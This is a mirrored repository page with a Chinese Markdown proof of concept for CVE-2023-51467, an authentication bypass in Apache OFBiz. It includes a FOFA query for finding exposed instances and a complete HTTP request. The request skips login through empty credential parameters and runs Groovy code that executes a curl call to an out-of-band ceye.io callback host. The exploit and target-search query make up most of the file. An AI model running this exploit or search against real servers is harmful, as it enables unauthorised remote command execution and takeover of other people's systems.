admin/wy876_POC
1
0
Fork 0
mirror of https://github.com/wy876/POC.git synced 2025-02-27 04:39:25 +00:00
Code Issues Packages Projects Releases Wiki Activity
wy876_POC/Apache OFBiz 身份验证绕过漏洞 (CVE-2023-51467).md

42 lines
1.6 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

## Apache OFBiz 身份验证绕过漏洞 (CVE-2023-51467)
Apache OFBiz 在后台提供了执行groovy 代码的功能但是由于存在认证绕过问题攻击者可构造恶意请求绕过身份认证利用后台相关接口功能执行groovy代码执行任意命令控制服务器。
## fofa
```
app="Apache_OFBiz"
```
## poc
```
POST /webtools/control/ProgramExport?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 127.0.0.1:8443
Cookie: OFBiz.Visitor=10100
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: https://127.0.0.1:8443/accounting/control/main
Content-Type: application/x-www-form-urlencoded
Content-Length: 166
Origin: https://127.0.0.1:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
groovyProgram=import+groovy.lang.GroovyShell%0D%0A%0D%0AGroovyShell+shell+%3D+new+GroovyShell%28%29%3B%0D%0Ashell.evaluate%28%27%22curl+CVE-2023-51467.xxxxxx.ceye.io%22.execute%28%29%27%29
```
![c930c2bb7200a1868dad8c9d1e58cf38](https://github.com/wy876/POC/assets/139549762/b516c218-f05a-45f9-974e-be96acd0a93c)
## 漏洞来源
- https://y4tacker.github.io/2023/12/27/year/2023/12/Apache-OFBiz%E6%9C%AA%E6%8E%88%E6%9D%83%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%B5%85%E6%9E%90-CVE-2023-51467/
- https://mp.weixin.qq.com/s/A0pwnvbJ44mlm3E1JoFVBA
Reference in New Issue View Git Blame Copy Permalink